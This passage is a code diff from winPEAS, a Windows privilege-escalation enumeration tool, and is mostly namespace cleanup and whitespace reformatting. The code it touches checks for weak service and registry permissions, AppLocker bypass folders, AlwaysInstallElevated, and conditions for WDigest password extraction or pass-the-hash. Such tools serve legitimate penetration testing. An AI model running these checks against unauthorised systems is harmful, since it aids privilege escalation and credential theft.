-                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(serviceInfo["FilteredPath"], winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(serviceInfo["FilteredPath"], Checks.CurrentUserSiDs);
                     List<string> dirRights = new List<string>();
 
                     if (serviceInfo["FilteredPath"] != null && serviceInfo["FilteredPath"] != "")
                     {
-                        dirRights = PermissionsHelper.GetPermissionsFolder(Path.GetDirectoryName(serviceInfo["FilteredPath"]), winPEAS.Checks.Checks.CurrentUserSiDs);
+                        dirRights = PermissionsHelper.GetPermissionsFolder(Path.GetDirectoryName(serviceInfo["FilteredPath"]), Checks.CurrentUserSiDs);
                     }
 
                     bool noQuotesAndSpace = MyUtils.CheckQuoteAndSpace(serviceInfo["PathName"]);
@@ -159,7 +159,7 @@ namespace winPEAS.Checks
             {
                 Beaprint.MainPrint("Looking if you can modify any service registry");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services-registry-permissions", "Check if you can modify the registry of a service");
-                List<Dictionary<string, string>> regPerms = ServicesInfoHelper.GetWriteServiceRegs(winPEAS.Checks.Checks.CurrentUserSiDs);
+                List<Dictionary<string, string>> regPerms = ServicesInfoHelper.GetWriteServiceRegs(Checks.CurrentUserSiDs);
 
                 Dictionary<string, string> colorsWR = new Dictionary<string, string>()
                             {

winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs

@@ -5,21 +5,21 @@ using System.Linq;
 using System.Reflection;
 using System.Runtime.InteropServices;
 using System.Text.RegularExpressions;
+using winPEAS._3rdParty.Watson;
 using winPEAS.Helpers;
 using winPEAS.Helpers.AppLocker;
-using winPEAS._3rdParty.Watson;
-using winPEAS.Info.SystemInfo.Printers;
-using winPEAS.Info.SystemInfo.NamedPipes;
-using winPEAS.Info.SystemInfo;
-using winPEAS.Info.SystemInfo.SysMon;
 using winPEAS.Helpers.Extensions;
 using winPEAS.Helpers.Registry;
+using winPEAS.Info.SystemInfo;
 using winPEAS.Info.SystemInfo.AuditPolicies;
 using winPEAS.Info.SystemInfo.DotNet;
 using winPEAS.Info.SystemInfo.GroupPolicy;
-using winPEAS.Info.SystemInfo.WindowsDefender;
+using winPEAS.Info.SystemInfo.NamedPipes;
-using winPEAS.Info.SystemInfo.PowerShell;
 using winPEAS.Info.SystemInfo.Ntlm;
+using winPEAS.Info.SystemInfo.PowerShell;
+using winPEAS.Info.SystemInfo.Printers;
+using winPEAS.Info.SystemInfo.SysMon;
+using winPEAS.Info.SystemInfo.WindowsDefender;
 using winPEAS.Native.Enums;
 
 namespace winPEAS.Checks
@@ -47,13 +47,13 @@ namespace winPEAS.Checks
             { "3b576869-a4ec-4529-8536-b80a7769e899" , "Block Office applications from creating executable content	"},
             { "75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84" , "Block Office applications from injecting code into other processes"},
             { "d3e037e1-3eb8-44c8-a917-57927947596d" , "Block JavaScript or VBScript from launching downloaded executable content"},
-            { "be9ba2d9-53ea-4cdc-84e5-9b1eeee46550" , "Block executable content from email client and webmail"},           
+            { "be9ba2d9-53ea-4cdc-84e5-9b1eeee46550" , "Block executable content from email client and webmail"},
         };
 
         public void PrintInfo(bool isDebug)
         {
             Beaprint.GreatPrint("System Information");
-            
+
             new List<Action>
             {
                 PrintBasicSystemInfo,
@@ -107,7 +107,7 @@ namespace winPEAS.Checks
                     { Globals.StrTrue, Beaprint.ansi_color_bad },
                 };
                 Beaprint.DictPrint(basicDictSystem, colorsSI, false);
-                System.Console.WriteLine();
+                Console.WriteLine();
                 Watson.FindVulns();
 
                 //To update Watson, update the CVEs and add the new ones and update the main function so it uses new CVEs (becausfull with the Beaprints inside the FindVulns function)
@@ -200,7 +200,7 @@ namespace winPEAS.Checks
                 Beaprint.MainPrint("PS default transcripts history");
                 Beaprint.InfoPrint("Read the PS history inside these files (if any)");
                 string drive = Path.GetPathRoot(Environment.SystemDirectory);
-				string transcriptsPath = drive + @"transcripts\";
+                string transcriptsPath = drive + @"transcripts\";
                 string usersPath = $"{drive}users";
 
                 var users = Directory.EnumerateDirectories(usersPath, "*", SearchOption.TopDirectoryOnly);
@@ -210,7 +210,7 @@ namespace winPEAS.Checks
                 {
                     { "^.*", Beaprint.ansi_color_bad },
                 };
-                
+
                 var results = new List<string>();
 
                 var dict = new Dictionary<string, string>()
@@ -218,7 +218,7 @@ namespace winPEAS.Checks
                     // check \\transcripts\ folder
                     {transcriptsPath, "*"},
                 };
-                    
+
                 foreach (var user in users)
                 {
                     // check the users directories
@@ -290,12 +290,12 @@ namespace winPEAS.Checks
                     Beaprint.NoColorPrint($"    Domain        :     {policy.Domain}\n" +
                                                 $"    GPO           :     {policy.GPO}\n" +
                                                 $"    Type          :     {policy.Type}\n");
-                        
+
                     foreach (var entry in policy.Settings)
                     {
                         Beaprint.NoColorPrint($"        {entry.Subcategory,50}   :   {entry.AuditType}");
                     }
-                    
+
                     Beaprint.PrintLineSeparator();
                 }
             }
@@ -366,15 +366,15 @@ namespace winPEAS.Checks
             Beaprint.MainPrint("Credentials Guard");
             Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#credential-guard", "If enabled, a driver is needed to read LSASS memory");
             string lsaCfgFlags = RegistryHelper.GetRegValue("HKLM", @"System\CurrentControlSet\Control\LSA", "LsaCfgFlags");
-            
+
             if (lsaCfgFlags == "1")
             {
-                System.Console.WriteLine("    Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
+                Console.WriteLine("    Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
                 Beaprint.GoodPrint("    CredentialGuard is active with UEFI lock");
             }
             else if (lsaCfgFlags == "2")
             {
-                System.Console.WriteLine("    Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
+                Console.WriteLine("    Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
                 Beaprint.GoodPrint("    CredentialGuard is active without UEFI lock");
             }
             else
@@ -572,7 +572,7 @@ namespace winPEAS.Checks
                     else if (using_HKLM_WSUS == "0")
                         Beaprint.GoodPrint("    But UseWUServer is equals to 0, so it is not vulnerable!");
                     else
-                        System.Console.WriteLine("    But UseWUServer is equals to " + using_HKLM_WSUS + ", so it may work or not");
+                        Console.WriteLine("    But UseWUServer is equals to " + using_HKLM_WSUS + ", so it may work or not");
                 }
                 else
                 {
@@ -643,9 +643,9 @@ namespace winPEAS.Checks
                 string path = "Software\\Policies\\Microsoft\\Windows\\Installer";
                 string HKLM_AIE = RegistryHelper.GetRegValue("HKLM", path, "AlwaysInstallElevated");
                 string HKCU_AIE = RegistryHelper.GetRegValue("HKCU", path, "AlwaysInstallElevated");
-                
+
                 if (HKLM_AIE == "1")
-                { 
+                {
                     Beaprint.BadPrint("    AlwaysInstallElevated set to 1 in HKLM!");
                 }
 
@@ -672,7 +672,7 @@ namespace winPEAS.Checks
             try
             {
                 var info = Ntlm.GetNtlmSettingsInfo();
-                
+
                 string lmCompatibilityLevelColor = info.LanmanCompatibilityLevel >= 3 ? Beaprint.ansi_color_good : Beaprint.ansi_color_bad;
                 Beaprint.ColorPrint($"  LanmanCompatibilityLevel    : {info.LanmanCompatibilityLevel} ({info.LanmanCompatibilityLevelString})\n", lmCompatibilityLevelColor);
 
@@ -683,12 +683,12 @@ namespace winPEAS.Checks
                     { "No signing", Beaprint.ansi_color_bad},
                     { "null", Beaprint.ansi_color_bad},
                     { "Require Signing", Beaprint.ansi_color_good},
-                    { "Negotiate signing", Beaprint.ansi_color_yellow},                    
+                    { "Negotiate signing", Beaprint.ansi_color_yellow},
                     { "Unknown", Beaprint.ansi_color_bad},
                 };
 
                 Beaprint.ColorPrint("\n  NTLM Signing Settings", Beaprint.LBLUE);
-                Beaprint.AnsiPrint($"      ClientRequireSigning    : {info.ClientRequireSigning}\n" + 
+                Beaprint.AnsiPrint($"      ClientRequireSigning    : {info.ClientRequireSigning}\n" +
                                    $"      ClientNegotiateSigning  : {info.ClientNegotiateSigning}\n" +
                                    $"      ServerRequireSigning    : {info.ServerRequireSigning}\n" +
                                    $"      ServerNegotiateSigning  : {info.ServerNegotiateSigning}\n" +
@@ -727,13 +727,13 @@ namespace winPEAS.Checks
                     }
                 }
 
-                var ntlmOutboundRestrictionsColor = info.OutboundRestrictions == 2 ? Beaprint.ansi_color_good : Beaprint.ansi_color_bad;                
+                var ntlmOutboundRestrictionsColor = info.OutboundRestrictions == 2 ? Beaprint.ansi_color_good : Beaprint.ansi_color_bad;
 
                 Beaprint.ColorPrint("\n  NTLM Auditing and Restrictions", Beaprint.LBLUE);
                 Beaprint.NoColorPrint($"      InboundRestrictions     : {info.InboundRestrictions} ({info.InboundRestrictionsString})");
                 Beaprint.ColorPrint($"      OutboundRestrictions    : {info.OutboundRestrictions} ({info.OutboundRestrictionsString})", ntlmOutboundRestrictionsColor);
                 Beaprint.NoColorPrint($"      InboundAuditing         : {info.InboundAuditing} ({info.InboundRestrictionsString})");
-                Beaprint.NoColorPrint($"      OutboundExceptions      : {info.OutboundExceptions}");            
+                Beaprint.NoColorPrint($"      OutboundExceptions      : {info.OutboundExceptions}");
             }
             catch (Exception ex)
             {
@@ -783,7 +783,7 @@ namespace winPEAS.Checks
                     Beaprint.AnsiPrint(string.Format(formatString, namedPipe.Name, namedPipe.CurrentUserPerms, namedPipe.Sddl), colors);
                 }
             }
-            catch (Exception ex) 
+            catch (Exception ex)
             {
                 //Beaprint.PrintException(ex.Message);
             }
@@ -816,8 +816,8 @@ namespace winPEAS.Checks
         {
             PrintSysmonConfiguration();
             PrintSysmonEventLogs();
-        }        
+        }
-        
+
         private void PrintSysmonConfiguration()
         {
             Beaprint.MainPrint("Enumerating Sysmon configuration");
@@ -1070,7 +1070,7 @@ namespace winPEAS.Checks
                         }
                         else if (kvp.Value.GetType().IsArray && (kvp.Value.GetType().GetElementType().ToString() == "System.Byte"))
                         {
-                            val = System.BitConverter.ToString((byte[])kvp.Value);
+                            val = BitConverter.ToString((byte[])kvp.Value);
                         }
                         else
                         {
@@ -1086,12 +1086,12 @@ namespace winPEAS.Checks
                             Beaprint.BadPrint("    [!]      WDigest is enabled - plaintext password extraction is possible!");
                         }
 
-                        if (key.Equals("RunAsPPL", System.StringComparison.InvariantCultureIgnoreCase) && val == "1")
+                        if (key.Equals("RunAsPPL", StringComparison.InvariantCultureIgnoreCase) && val == "1")
                         {
                             Beaprint.BadPrint("    [!]      LSASS Protected Mode is enabled! You will not be able to access lsass.exe's memory easily.");
                         }
 
-                        if (key.Equals("DisableRestrictedAdmin", System.StringComparison.InvariantCultureIgnoreCase) && val == "0")
+                        if (key.Equals("DisableRestrictedAdmin", StringComparison.InvariantCultureIgnoreCase) && val == "0")
                         {
                             Beaprint.BadPrint("    [!]      RDP Restricted Admin Mode is enabled! You can use pass-the-hash to access RDP on this system.");
                         }
@@ -1107,7 +1107,7 @@ namespace winPEAS.Checks
         {
             try
             {
-                Beaprint.MainPrint("Display Local Group Policy settings - local users/machine" );
+                Beaprint.MainPrint("Display Local Group Policy settings - local users/machine");
 
                 var infos = GroupPolicy.GetLocalGroupPolicyInfos();
 

winPEAS/winPEASexe/winPEAS/Checks/UserInfo.cs

@@ -1,8 +1,6 @@
 using System;
 using System.Collections.Generic;
-using System.ComponentModel;
 using System.Runtime.InteropServices;
-using System.Security.Cryptography;
 using System.Security.Principal;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Extensions;
@@ -39,7 +37,7 @@ namespace winPEAS.Checks
         public void PrintInfo(bool isDebug)
         {
             Beaprint.GreatPrint("Users Information");
-            
+
             new List<Action>
             {
                 PrintCU,
@@ -158,7 +156,7 @@ namespace winPEAS.Checks
             try
             {
                 Beaprint.MainPrint("RDP Sessions");
-                List<Dictionary<string, string>> rdp_sessions = Info.UserInfo.UserInfoHelper.GetRDPSessions();
+                List<Dictionary<string, string>> rdp_sessions = UserInfoHelper.GetRDPSessions();
                 if (rdp_sessions.Count > 0)
                 {
                     string format = "    {0,-10}{1,-15}{2,-15}{3,-25}{4,-10}{5}";
@@ -263,7 +261,7 @@ namespace winPEAS.Checks
             {
                 Beaprint.MainPrint("Password Policies");
                 Beaprint.LinkPrint("", "Check for a possible brute-force");
-                List<Dictionary<string, string>> PPy = Info.UserInfo.UserInfoHelper.GetPasswordPolicy();
+                List<Dictionary<string, string>> PPy = UserInfoHelper.GetPasswordPolicy();
                 Beaprint.DictPrint(PPy, ColorsU(), false);
             }
             catch (Exception ex)
@@ -282,7 +280,7 @@ namespace winPEAS.Checks
 
                 foreach (var logonSession in logonSessions)
                 {
-                    Beaprint.NoColorPrint  ($"    Method:                       {logonSession.Method}\n" + 
+                    Beaprint.NoColorPrint($"    Method:                       {logonSession.Method}\n" +
                                             $"    Logon Server:                 {logonSession.LogonServer}\n" +
                                             $"    Logon Server Dns Domain:      {logonSession.LogonServerDnsDomain}\n" +
                                             $"    Logon Id:                     {logonSession.LogonId}\n" +
@@ -317,7 +315,7 @@ namespace winPEAS.Checks
                 if (User32.GetLastInputInfo(ref lastInputInfo))
                 {
                     var currentUser = WindowsIdentity.GetCurrent().Name;
-                    var idleTimeMiliSeconds = (uint) Environment.TickCount - lastInputInfo.Time;
+                    var idleTimeMiliSeconds = (uint)Environment.TickCount - lastInputInfo.Time;
                     var timeSpan = TimeSpan.FromMilliseconds(idleTimeMiliSeconds);
                     var idleTimeString = $"{timeSpan.Hours:D2}h:{timeSpan.Minutes:D2}m:{timeSpan.Seconds:D2}s:{timeSpan.Milliseconds:D3}ms";
 
@@ -364,7 +362,7 @@ namespace winPEAS.Checks
                         lastLogon = lastLogon.AddSeconds(localUser.last_logon).ToLocalTime();
                     }
 
-                    Beaprint.AnsiPrint( $"   Computer Name           :   {computerName}\n" +
+                    Beaprint.AnsiPrint($"   Computer Name           :   {computerName}\n" +
                                         $"   User Name               :   {localUser.name}\n" +
                                         $"   User Id                 :   {localUser.user_id}\n" +
                                         $"   Is Enabled              :   {enabled}\n" +

winPEAS/winPEASexe/winPEAS/Helpers/AppLocker/AppLockerHelper.cs

@@ -7,9 +7,9 @@ using System.Runtime.InteropServices;
 namespace winPEAS.Helpers.AppLocker
 {
     internal static class AppLockerHelper
-    {        
+    {
         private static readonly HashSet<string> _appLockerByPassDirectoriesSet = new HashSet<string>
-        {            
+        {
             @"C:\Windows\Temp",
             @"C:\Windows\System32\spool\drivers\color",
             @"C:\Windows\Tasks",
@@ -88,7 +88,7 @@ namespace winPEAS.Helpers.AppLocker
                         PrintFilePathRules(rule);
                         PrintFilePublisherRules(rule);
                     }
-                }                
+                }
             }
             catch (COMException)
             {
@@ -116,7 +116,7 @@ namespace winPEAS.Helpers.AppLocker
 
                 var color = GetColorBySid(filePublisherRule.UserOrGroupSid);
 
-                Beaprint.ColorPrint(  $"   User Or Group Sid:       {filePublisherRule.UserOrGroupSid}\n", color);
+                Beaprint.ColorPrint($"   User Or Group Sid:       {filePublisherRule.UserOrGroupSid}\n", color);
 
                 Beaprint.GoodPrint($"   Conditions");
 
@@ -150,10 +150,10 @@ namespace winPEAS.Helpers.AppLocker
                                       $"   Translated Name:         {normalizedName}\n" +
                                       $"   Description:             {filePathRule.Description}\n" +
                                       $"   Action:                  {filePathRule.Action}");
-                
+
                 var color = GetColorBySid(filePathRule.UserOrGroupSid);
 
-                Beaprint.ColorPrint(  $"   User Or Group Sid:       {filePathRule.UserOrGroupSid}\n", color);
+                Beaprint.ColorPrint($"   User Or Group Sid:       {filePathRule.UserOrGroupSid}\n", color);
 
                 Beaprint.GoodPrint($"   Conditions");
 
@@ -241,7 +241,7 @@ namespace winPEAS.Helpers.AppLocker
                                         Beaprint.ColorPrint($"    No potential bypass found while recursively checking files/subfolders " +
                                                                     $"for write or equivalent permissions with depth: {FolderCheckMaxDepth}\n" +
                                                                     $"    Check permissions manually.", Beaprint.YELLOW);
-                                    }                                    
+                                    }
                                 }
                             }
                         }
@@ -328,39 +328,42 @@ namespace winPEAS.Helpers.AppLocker
 
             try
             {
-                var subfolders = Directory.EnumerateDirectories(path);
+                if (Directory.Exists(path))
-                var files = Directory.EnumerateFiles(path, "*", SearchOption.TopDirectoryOnly);
-
-                ruleType = ruleType.ToLower();
-
-                if (!_appLockerFileExtensionsByType.ContainsKey(ruleType))
                 {
-                    throw new ArgumentException(nameof(ruleType));
+                    var subfolders = Directory.EnumerateDirectories(path);
-                }
+                    var files = Directory.EnumerateFiles(path, "*", SearchOption.TopDirectoryOnly);
-                
-                var filteredFiles =
-                    (from file in files
-                     let extension = Path.GetExtension(file)?.ToLower() ?? string.Empty
-                     where _appLockerFileExtensionsByType[ruleType].Contains(extension)
-                     select file).ToList();
 
-                // first check write access for files
+                    ruleType = ruleType.ToLower();
-                if (filteredFiles.Any(CheckFileWriteAccess))
-                {
-                    return true;
-                }
 
-                // if we have not found any writable file, 
+                    if (!_appLockerFileExtensionsByType.ContainsKey(ruleType))
-                // check subfolders for write access
+                    {
-                if (subfolders.Any(subfolder => CheckDirectoryWriteAccess(subfolder, out bool _, isGoodPrint: false)))
+                        throw new ArgumentException(nameof(ruleType));
-                {
+                    }
-                    return true;
-                }
 
-                // check recursively all the subfolders for files/sub-subfolders                     
+                    var filteredFiles =
-                if (subfolders.Any(subfolder => CheckFilesAndSubfolders(subfolder, ruleType, depth + 1)))
+                        (from file in files
-                {
+                         let extension = Path.GetExtension(file)?.ToLower() ?? string.Empty
-                    return true;
+                         where _appLockerFileExtensionsByType[ruleType].Contains(extension)
+                         select file).ToList();
+
+                    // first check write access for files
+                    if (filteredFiles.Any(CheckFileWriteAccess))
+                    {
+                        return true;
+                    }
+
+                    // if we have not found any writable file, 
+                    // check subfolders for write access
+                    if (subfolders.Any(subfolder => CheckDirectoryWriteAccess(subfolder, out bool _, isGoodPrint: false)))
+                    {
+                        return true;
+                    }
+
+                    // check recursively all the subfolders for files/sub-subfolders                     
+                    if (subfolders.Any(subfolder => CheckFilesAndSubfolders(subfolder, ruleType, depth + 1)))
+                    {
+                        return true;
+                    }
                 }
             }
             catch (Exception)

winPEAS/winPEASexe/winPEAS/Helpers/AppLocker/IAppIdPolicyHandler.cs

@@ -5,79 +5,79 @@ using System.Runtime.InteropServices;
 namespace winPEAS.Helpers.AppLocker
 {
     [Guid("B6FEA19E-32DD-4367-B5B7-2F5DA140E87D")]
-	[TypeLibType(TypeLibTypeFlags.FDual | TypeLibTypeFlags.FNonExtensible | TypeLibTypeFlags.FDispatchable)]
+    [TypeLibType(TypeLibTypeFlags.FDual | TypeLibTypeFlags.FNonExtensible | TypeLibTypeFlags.FDispatchable)]
-	[ComImport]
+    [ComImport]
-	public interface IAppIdPolicyHandler
+    public interface IAppIdPolicyHandler
-	{
+    {
-		// Token: 0x06000001 RID: 1
+        // Token: 0x06000001 RID: 1
-		[DispId(1)]
+        [DispId(1)]
-		[MethodImpl(MethodImplOptions.InternalCall)]
+        [MethodImpl(MethodImplOptions.InternalCall)]
-		void SetPolicy([MarshalAs(UnmanagedType.BStr)][In] string bstrLdapPath, [MarshalAs(UnmanagedType.BStr)][In] string bstrXmlPolicy);
+        void SetPolicy([MarshalAs(UnmanagedType.BStr)][In] string bstrLdapPath, [MarshalAs(UnmanagedType.BStr)][In] string bstrXmlPolicy);
 
-		// Token: 0x06000002 RID: 2
+        // Token: 0x06000002 RID: 2
-		[DispId(2)]
+        [DispId(2)]
-		[MethodImpl(MethodImplOptions.InternalCall)]
+        [MethodImpl(MethodImplOptions.InternalCall)]
-		[return: MarshalAs(UnmanagedType.BStr)]
+        [return: MarshalAs(UnmanagedType.BStr)]
-		string GetPolicy([MarshalAs(UnmanagedType.BStr)][In] string bstrLdapPath);
+        string GetPolicy([MarshalAs(UnmanagedType.BStr)][In] string bstrLdapPath);
 
-		// Token: 0x06000003 RID: 3
+        // Token: 0x06000003 RID: 3
-		[DispId(3)]
+        [DispId(3)]
-		[MethodImpl(MethodImplOptions.InternalCall)]
+        [MethodImpl(MethodImplOptions.InternalCall)]
-		[return: MarshalAs(UnmanagedType.BStr)]
+        [return: MarshalAs(UnmanagedType.BStr)]
-		string GetEffectivePolicy();
+        string GetEffectivePolicy();
 
-		// Token: 0x06000004 RID: 4
+        // Token: 0x06000004 RID: 4
-		[DispId(4)]
+        [DispId(4)]
-		[MethodImpl(MethodImplOptions.InternalCall)]
+        [MethodImpl(MethodImplOptions.InternalCall)]
-		int IsFileAllowed([MarshalAs(UnmanagedType.BStr)][In] string bstrXmlPolicy, [MarshalAs(UnmanagedType.BStr)][In] string bstrFilePath, [MarshalAs(UnmanagedType.BStr)][In] string bstrUserSid, out Guid pguidResponsibleRuleId);
+        int IsFileAllowed([MarshalAs(UnmanagedType.BStr)][In] string bstrXmlPolicy, [MarshalAs(UnmanagedType.BStr)][In] string bstrFilePath, [MarshalAs(UnmanagedType.BStr)][In] string bstrUserSid, out Guid pguidResponsibleRuleId);
 
-		// Token: 0x06000005 RID: 5
+        // Token: 0x06000005 RID: 5
-		[DispId(5)]
+        [DispId(5)]
-		[MethodImpl(MethodImplOptions.InternalCall)]
+        [MethodImpl(MethodImplOptions.InternalCall)]
-		int IsPackageAllowed([MarshalAs(UnmanagedType.BStr)][In] string bstrXmlPolicy, [MarshalAs(UnmanagedType.BStr)][In] string bstrPublisherName, [MarshalAs(UnmanagedType.BStr)][In] string bstrPackageName, [In] ulong ullPackageVersion, [MarshalAs(UnmanagedType.BStr)][In] string bstrUserSid, out Guid pguidResponsibleRuleId);
+        int IsPackageAllowed([MarshalAs(UnmanagedType.BStr)][In] string bstrXmlPolicy, [MarshalAs(UnmanagedType.BStr)][In] string bstrPublisherName, [MarshalAs(UnmanagedType.BStr)][In] string bstrPackageName, [In] ulong ullPackageVersion, [MarshalAs(UnmanagedType.BStr)][In] string bstrUserSid, out Guid pguidResponsibleRuleId);
-	}
+    }
 
-	// Token: 0x02000003 RID: 3
+    // Token: 0x02000003 RID: 3
-	[CoClass(typeof(AppIdPolicyHandlerClass))]
+    [CoClass(typeof(AppIdPolicyHandlerClass))]
-	[Guid("B6FEA19E-32DD-4367-B5B7-2F5DA140E87D")]
+    [Guid("B6FEA19E-32DD-4367-B5B7-2F5DA140E87D")]
-	[ComImport]
+    [ComImport]
-	public interface AppIdPolicyHandler : IAppIdPolicyHandler
+    public interface AppIdPolicyHandler : IAppIdPolicyHandler
-	{
+    {
-	}
+    }
 
-	// Token: 0x02000004 RID: 4
+    // Token: 0x02000004 RID: 4
-	[Guid("F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3")]
+    [Guid("F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3")]
-	[ClassInterface(ClassInterfaceType.None)]
+    [ClassInterface(ClassInterfaceType.None)]
-	[TypeLibType(TypeLibTypeFlags.FCanCreate)]
+    [TypeLibType(TypeLibTypeFlags.FCanCreate)]
-	[ComImport]
+    [ComImport]
-	public class AppIdPolicyHandlerClass : IAppIdPolicyHandler, AppIdPolicyHandler
+    public class AppIdPolicyHandlerClass : IAppIdPolicyHandler, AppIdPolicyHandler
-	{
+    {
 
-		// Token: 0x06000007 RID: 7
+        // Token: 0x06000007 RID: 7
-		[DispId(1)]
+        [DispId(1)]
-		[MethodImpl(MethodImplOptions.InternalCall)]
+        [MethodImpl(MethodImplOptions.InternalCall)]
-		public virtual extern void SetPolicy([MarshalAs(UnmanagedType.BStr)][In] string bstrLdapPath, [MarshalAs(UnmanagedType.BStr)][In] string bstrXmlPolicy);
+        public virtual extern void SetPolicy([MarshalAs(UnmanagedType.BStr)][In] string bstrLdapPath, [MarshalAs(UnmanagedType.BStr)][In] string bstrXmlPolicy);
 
-		// Token: 0x06000008 RID: 8
+        // Token: 0x06000008 RID: 8
-		[DispId(2)]
+        [DispId(2)]
-		[MethodImpl(MethodImplOptions.InternalCall)]
+        [MethodImpl(MethodImplOptions.InternalCall)]
-		[return: MarshalAs(UnmanagedType.BStr)]
+        [return: MarshalAs(UnmanagedType.BStr)]
-		public virtual extern string GetPolicy([MarshalAs(UnmanagedType.BStr)][In] string bstrLdapPath);
+        public virtual extern string GetPolicy([MarshalAs(UnmanagedType.BStr)][In] string bstrLdapPath);
 
-		// Token: 0x06000009 RID: 9
+        // Token: 0x06000009 RID: 9
-		[DispId(3)]
+        [DispId(3)]
-		[MethodImpl(MethodImplOptions.InternalCall)]
+        [MethodImpl(MethodImplOptions.InternalCall)]
-		[return: MarshalAs(UnmanagedType.BStr)]
+        [return: MarshalAs(UnmanagedType.BStr)]
-		public virtual extern string GetEffectivePolicy();
+        public virtual extern string GetEffectivePolicy();
 
-		// Token: 0x0600000A RID: 10
+        // Token: 0x0600000A RID: 10
-		[DispId(4)]
+        [DispId(4)]
-		[MethodImpl(MethodImplOptions.InternalCall)]
+        [MethodImpl(MethodImplOptions.InternalCall)]
-		public virtual extern int IsFileAllowed([MarshalAs(UnmanagedType.BStr)][In] string bstrXmlPolicy, [MarshalAs(UnmanagedType.BStr)][In] string bstrFilePath, [MarshalAs(UnmanagedType.BStr)][In] string bstrUserSid, out Guid pguidResponsibleRuleId);
+        public virtual extern int IsFileAllowed([MarshalAs(UnmanagedType.BStr)][In] string bstrXmlPolicy, [MarshalAs(UnmanagedType.BStr)][In] string bstrFilePath, [MarshalAs(UnmanagedType.BStr)][In] string bstrUserSid, out Guid pguidResponsibleRuleId);
 
-		// Token: 0x0600000B RID: 11
+        // Token: 0x0600000B RID: 11
-		[DispId(5)]
+        [DispId(5)]
-		[MethodImpl(MethodImplOptions.InternalCall)]
+        [MethodImpl(MethodImplOptions.InternalCall)]
-		public virtual extern int IsPackageAllowed([MarshalAs(UnmanagedType.BStr)][In] string bstrXmlPolicy, [MarshalAs(UnmanagedType.BStr)][In] string bstrPublisherName, [MarshalAs(UnmanagedType.BStr)][In] string bstrPackageName, [In] ulong ullPackageVersion, [MarshalAs(UnmanagedType.BStr)][In] string bstrUserSid, out Guid pguidResponsibleRuleId);
+        public virtual extern int IsPackageAllowed([MarshalAs(UnmanagedType.BStr)][In] string bstrXmlPolicy, [MarshalAs(UnmanagedType.BStr)][In] string bstrPublisherName, [MarshalAs(UnmanagedType.BStr)][In] string bstrPackageName, [In] ulong ullPackageVersion, [MarshalAs(UnmanagedType.BStr)][In] string bstrUserSid, out Guid pguidResponsibleRuleId);
-	}
+    }
 }

winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs

@@ -1,7 +1,6 @@
 using System;
 using System.Collections.Generic;
 using System.Text.RegularExpressions;
-using System.Threading;
 
 namespace winPEAS.Helpers
 {
@@ -105,7 +104,7 @@ namespace winPEAS.Helpers
 
             PrintLegend();
             Console.WriteLine();
-            LinkPrint("https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation", "You can find a Windows local PE Checklist here:");
+            Console.WriteLine(BLUE + " You can find a Windows local PE Checklist here: " + YELLOW + "https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation");
         }
 
         static void PrintLegend()
@@ -142,7 +141,7 @@ namespace winPEAS.Helpers
             Console.WriteLine(LCYAN + "        debug" + GRAY + "                Display debugging information - memory usage, method execution time" + NOCOLOR);
             Console.WriteLine(LCYAN + "        log[=logfile]" + GRAY + $"        Log all output to file defined as logfile, or to \"{Checks.Checks.DefaultLogFile}\" if not specified" + NOCOLOR);
             Console.WriteLine(LCYAN + "        max-regex-file-size=1000000" + GRAY + $"        Max file size (in Bytes) to search regex in. Default: {Checks.Checks.MaxRegexFileSize}B" + NOCOLOR);
-            
+
             Console.WriteLine();
             Console.WriteLine(GREEN + "        Additional checks (slower):");
             Console.WriteLine(LCYAN + "        -lolbas" + GRAY + $"              Run additional LOLBAS check" + NOCOLOR);

winPEAS/winPEASexe/winPEAS/Helpers/CredentialManager/Credential.cs

@@ -4,7 +4,6 @@ using System.Linq;
 using System.Runtime.InteropServices;
 using System.Security;
 using System.Security.Permissions;
-using System.Text;
 using winPEAS.Native;
 using winPEAS.Native.Enums;
 
@@ -394,6 +393,6 @@ namespace winPEAS.Helpers.CredentialManager
             PersistenceType = (PersistenceType)credential.Persist;
             Description = credential.Comment;
             LastWriteTimeUtc = DateTime.FromFileTimeUtc(credential.LastWritten);
-        }       
+        }
     }
 }

winPEAS/winPEASexe/winPEAS/Helpers/CredentialManager/CredentialType.cs

@@ -1,4 +1,4 @@
 namespace winPEAS.Helpers.CredentialManager
 {
-    
+
 }

winPEAS/winPEASexe/winPEAS/Helpers/CredentialManager/NativeMethods.cs

@@ -1,9 +1,9 @@
-using System;
+using Microsoft.Win32.SafeHandles;
+using System;
 using System.Collections.Generic;
 using System.ComponentModel;
 using System.Linq;
 using System.Runtime.InteropServices;
-using Microsoft.Win32.SafeHandles;
 using winPEAS.Native;
 
 namespace winPEAS.Helpers.CredentialManager
@@ -18,7 +18,7 @@ namespace winPEAS.Helpers.CredentialManager
     /// </summary>
     public class NativeMethods
     {
-        
+
         /// <summary>
         /// The CREDENTIAL structure contains an individual credential.
         /// 

winPEAS/winPEASexe/winPEAS/Helpers/DomainHelper.cs

@@ -1,5 +1,4 @@
 using System;
-using System.Runtime.InteropServices;
 using winPEAS.Native;
 using winPEAS.Native.Enums;
 
@@ -15,9 +14,9 @@ namespace winPEAS.Helpers
     {
         internal class Win32
         {
-            public const int ErrorSuccess = 0;           
+            public const int ErrorSuccess = 0;
+
 
-            
         }
 
         public static string IsDomainJoined()

winPEAS/winPEASexe/winPEAS/Helpers/HandlesHelper.cs

@@ -1,11 +1,9 @@
 using System;
 using System.Collections.Generic;
 using System.Diagnostics;
-using System.Linq;
